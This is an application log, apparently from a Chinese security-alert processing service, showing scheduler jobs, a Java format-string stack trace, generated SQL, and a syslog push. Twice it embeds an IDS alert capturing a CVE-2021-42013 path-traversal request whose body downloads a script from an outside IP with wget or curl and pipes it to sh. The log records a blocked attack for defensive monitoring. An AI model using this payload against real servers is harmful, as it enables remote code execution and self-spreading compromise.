"deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013)", "alarmType":"WEB????->·??????", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013). ?????192.168.101.1/41614, ????192.168.101.173/80"}
2026-05-19 12:54:14.390 [log-processor-2] WARN c.c.service.LogDataFilterService - 泛化规则-数据过滤规则为空,默认不处理!
2026-05-19 12:54:14.679 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 批次处理完成,总数: 1
2026-05-19 12:55:00.011 [scheduling-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:55:00.011 [log-processor-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:55:00.106 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 12:55:00.242 [scheduling-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:55:00.252 [log-processor-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:55:00.293 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:1,耗时:187ms
2026-05-19 12:55:00.294 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T12:55:00.294
2026-05-19 12:55:00.302 [scheduling-6] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T12:55:00.302
2026-05-19 12:55:00.490 [scheduling-9] INFO c.c.service.AccessLogAlertService - 获取到 1 条新的日志数据,时间范围: 2026-05-19T12:52:51.652 到 2026-05-19T12:55:00.242
2026-05-19 12:55:00.490 [scheduling-9] INFO c.c.service.AccessLogAlertService - 开始处理算法: 测试算法3 (ID: 2004083121877696514)
2026-05-19 12:55:00.641 [scheduling-9] INFO c.c.service.AccessLogAlertService - 算法 测试算法3 未检测到告警
2026-05-19 12:55:00.641 [scheduling-9] INFO c.c.service.AccessLogAlertService - 访问日志告警处理任务完成,下次将从 2026-05-19T12:55:00.242 开始处理
2026-05-19 12:55:00.776 [scheduling-6] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 12:55:00.777 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 483ms
2026-05-19 12:55:00.851 [log-processor-3] INFO c.c.service.AccessLogAlertService - 获取到 1 条新的日志数据,时间范围: 2026-05-19T12:55:00.242 到 2026-05-19T12:55:00.252
2026-05-19 12:55:00.852 [log-processor-3] INFO c.c.service.AccessLogAlertService - 开始处理算法: 测试算法3 (ID: 2004083121877696514)
2026-05-19 12:55:00.900 [log-processor-3] INFO c.c.service.AccessLogAlertService - 算法 测试算法3 未检测到告警
2026-05-19 12:55:00.900 [log-processor-3] INFO c.c.service.AccessLogAlertService - 访问日志告警处理任务完成,下次将从 2026-05-19T12:55:00.252 开始处理
2026-05-19 12:56:00.005 [scheduling-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:56:00.005 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T12:56:00.005
2026-05-19 12:56:00.005 [log-processor-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:56:00.227 [scheduling-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:56:00.227 [log-processor-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:56:00.436 [scheduling-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 12:56:00.436 [log-processor-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 12:56:00.903 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 1 条规则命中记录
2026-05-19 12:56:00.903 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 12:56:00.903 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:1
2026-05-19 12:56:01.053 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 12:56:01.053 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 12:56:01.206 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:1,耗时:1201ms
2026-05-19 12:57:00.003 [scheduling-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:57:00.004 [log-processor-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:57:00.228 [log-processor-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:57:00.229 [scheduling-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:57:00.466 [log-processor-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 12:57:00.467 [scheduling-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 12:58:00.002 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:58:00.003 [log-processor-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:58:00.227 [log-processor-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:58:00.230 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:58:00.495 [log-processor-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 12:58:00.498 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 12:59:00.008 [scheduling-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:59:00.009 [log-processor-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:59:00.231 [scheduling-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:59:00.234 [log-processor-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:59:00.503 [log-processor-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 12:59:00.646 [scheduling-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 13:00:00.003 [scheduling-1] INFO c.c.s.AlarmHealthCheckScheduler - ========== 开始执行告警健康检查 ==========
2026-05-19 13:00:00.003 [scheduling-6] INFO c.c.s.ProbeStatusCheckScheduler - ========== 开始探针状态检查 ==========
2026-05-19 13:00:00.003 [scheduling-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:00:00.004 [log-processor-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:00:00.077 [scheduling-10] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 13:00:00.225 [scheduling-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:00:00.228 [scheduling-6] INFO c.c.s.ProbeStatusCheckScheduler - 探针状态检查完成,所有探针在线, 耗时: 225ms
2026-05-19 13:00:00.228 [log-processor-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:00:00.230 [scheduling-10] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:1,耗时:153ms
2026-05-19 13:00:00.230 [scheduling-10] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T13:00:00.230
2026-05-19 13:00:00.230 [scheduling-1] INFO c.c.service.AlarmHealthCheckService - 告警表 alarm_20260519 健康检查: 4小时内数据量=0, 状态=异常
2026-05-19 13:00:00.230 [scheduling-10] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T13:00:00.230
2026-05-19 13:00:00.235 [scheduling-1] ERROR c.c.s.AlarmHealthCheckScheduler - 告警健康检查执行异常: d != java.lang.String
java.util.IllegalFormatConversionException: d != java.lang.String
at java.util.Formatter$FormatSpecifier.failConversion(Formatter.java:4302)
at java.util.Formatter$FormatSpecifier.printInteger(Formatter.java:2793)
at java.util.Formatter$FormatSpecifier.print(Formatter.java:2747)
at java.util.Formatter.format(Formatter.java:2520)
at java.util.Formatter.format(Formatter.java:2455)
at java.lang.String.format(String.java:2940)
at com.common.service.AlarmHealthCheckService.generateAlarmNotification(AlarmHealthCheckService.java:119)
at com.common.service.AlarmHealthCheckService.performHealthCheck(AlarmHealthCheckService.java:48)
at com.common.schedule.AlarmHealthCheckScheduler.scheduledHealthCheck(AlarmHealthCheckScheduler.java:32)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:84)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:54)
at org.springframework.scheduling.concurrent.ReschedulingRunnable.run(ReschedulingRunnable.java:95)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
2026-05-19 13:00:00.235 [scheduling-1] INFO c.c.s.AlarmHealthCheckScheduler - ========== 告警健康检查任务结束 ==========
2026-05-19 13:00:00.377 [scheduling-6] INFO c.c.s.ProbeStatusCheckScheduler - 探针统计: 总数=1, 在线=1, 离线=0
2026-05-19 13:00:00.377 [scheduling-6] INFO c.c.s.ProbeStatusCheckScheduler - ========== 探针状态检查结束 ==========
2026-05-19 13:00:00.471 [log-processor-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 13:00:00.513 [scheduling-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:55:00.252
2026-05-19 13:00:00.638 [scheduling-10] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 13:00:00.638 [scheduling-10] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 408ms
2026-05-19 13:00:24.465 [http-nio-8089-exec-4] INFO com.controllers.SyslogPushController - 收到syslog发送请求: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"安恒", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"安恒APT攻击(网络战)预警机", "deviceProductType":"入侵检测系统", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"中国", "srcGeoRegion":"香港", "srcGeoCity":"香港", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"中国", "destGeoRegion":"香港", "destGeoCity":"香港", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "alarmType":"WEB攻击->路径遍历", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013). 来源:192.168.101.1/41614, 目的:192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 13:00:24.465 [http-nio-8089-exec-4] INFO com.common.service.SyslogService - 开始发送syslog消息: IP=192.168.0.124, Port=514
2026-05-19 13:00:24.466 [http-nio-8089-exec-4] INFO com.common.service.SyslogService - TCP Syslog消息发送成功: 192.168.0.124:514
2026-05-19 13:00:24.467 [http-nio-8089-exec-4] INFO com.controllers.SyslogPushController - Syslog消息发送成功: IP=192.168.0.124, Port=514
2026-05-19 13:01:00.001 [scheduling-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:01:00.001 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T13:01:00.001
2026-05-19 13:01:00.001 [log-processor-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:01:00.228 [scheduling-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:01:00.230 [log-processor-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:01:00.458 [log-processor-9] INFO c.c.service.AccessLogAlertService - 获取到 1 条新的日志数据,时间范围: 2026-05-19T12:55:00.252 到 2026-05-19T13:01:00.230
2026-05-19 13:01:00.458 [log-processor-9] INFO c.c.service.AccessLogAlertService - 开始处理算法: 测试算法3 (ID: 2004083121877696514)
2026-05-19 13:01:00.502 [log-processor-9] INFO c.c.service.AccessLogAlertService - 算法 测试算法3 未检测到告警
2026-05-19 13:01:00.502 [log-processor-9] INFO c.c.service.AccessLogAlertService - 访问日志告警处理任务完成,下次将从 2026-05-19T13:01:00.230 开始处理
2026-05-19 13:01:00.519 [scheduling-9] INFO c.c.service.AccessLogAlertService - 获取到 1 条新的日志数据,时间范围: 2026-05-19T13:01:00.230 到 2026-05-19T13:01:00.228
2026-05-19 13:01:00.519 [scheduling-9] INFO c.c.service.AccessLogAlertService - 开始处理算法: 测试算法3 (ID: 2004083121877696514)
2026-05-19 13:01:00.563 [scheduling-9] INFO c.c.service.AccessLogAlertService - 算法 测试算法3 未检测到告警
2026-05-19 13:01:00.563 [scheduling-9] INFO c.c.service.AccessLogAlertService - 访问日志告警处理任务完成,下次将从 2026-05-19T13:01:00.228 开始处理
2026-05-19 13:01:00.671 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 1 条规则命中记录
2026-05-19 13:01:00.671 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 13:01:00.671 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:1
2026-05-19 13:01:00.825 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 13:01:00.825 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 13:01:00.977 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:1,耗时:976ms
2026-05-19 13:02:00.008 [scheduling-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:02:00.008 [log-processor-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:02:00.231 [log-processor-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:02:00.233 [scheduling-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:02:00.494 [scheduling-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T13:01:00.228
2026-05-19 13:02:00.527 [log-processor-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T13:01:00.228
2026-05-19 13:03:00.003 [scheduling-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:03:00.003 [log-processor-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:03:00.229 [scheduling-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:03:00.229 [log-processor-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:03:00.488 [scheduling-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T13:01:00.228
2026-05-19 13:03:00.522 [log-processor-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T13:01:00.228
2026-05-19 13:03:10.295 [scheduling-5] INFO c.c.s.RealtimeAnalysisScheduler - 执行规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, nextTime=2026-05-19T13:03, now=2026-05-19T13:03:10.061
2026-05-19 13:03:10.295 [scheduling-5] INFO c.c.s.impl.AnalysisRuleServiceImpl - 执行实时分析规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 13:03:10.754 [scheduling-5] INFO c.c.s.impl.RealtimeAnalysisEngine - 滚动窗口查询范围: 窗口大小=10m,查询时间范围=[2026-05-19 12:53:00, 2026-05-19 13:03:00]
2026-05-19 13:03:10.754 [scheduling-5] INFO c.c.s.impl.RealtimeAnalysisEngine - 开始执行实时规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, batchNo=20260519130310448, windowType=tumble, dataStartTime=2026-05-19 12:53:00, dataEndTime=2026-05-19 13:03:00
2026-05-19 13:03:11.953 [scheduling-5] INFO c.c.s.impl.RealtimeAnalysisEngine - 生成的SQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 12:53:00' AND log_time < '2026-05-19 13:03:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 13:03:12.414 [scheduling-5] INFO c.c.s.impl.RealtimeAnalysisEngine - 规则执行成功: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 13:03:12.714 [scheduling-5] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 更新规则下次执行时间,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble, nextExecuteTime=2026-05-19 13:13:00
2026-05-19 13:03:12.714 [scheduling-5] INFO c.c.s.RealtimeAnalysisScheduler - 本次调度执行规则数: 1, 跳过规则数: 0
2026-05-19 13:04:00.011 [scheduling-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:04:00.011 [log-processor-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 13:04:00.234 [log-processor-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:04:00.237 [scheduling-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 13:04:00.573 [scheduling-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T13:01:00.228
2026-05-19 13:04:00.573 [log-processor-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T13:01:00.228
Reference in New Issue Copy Permalink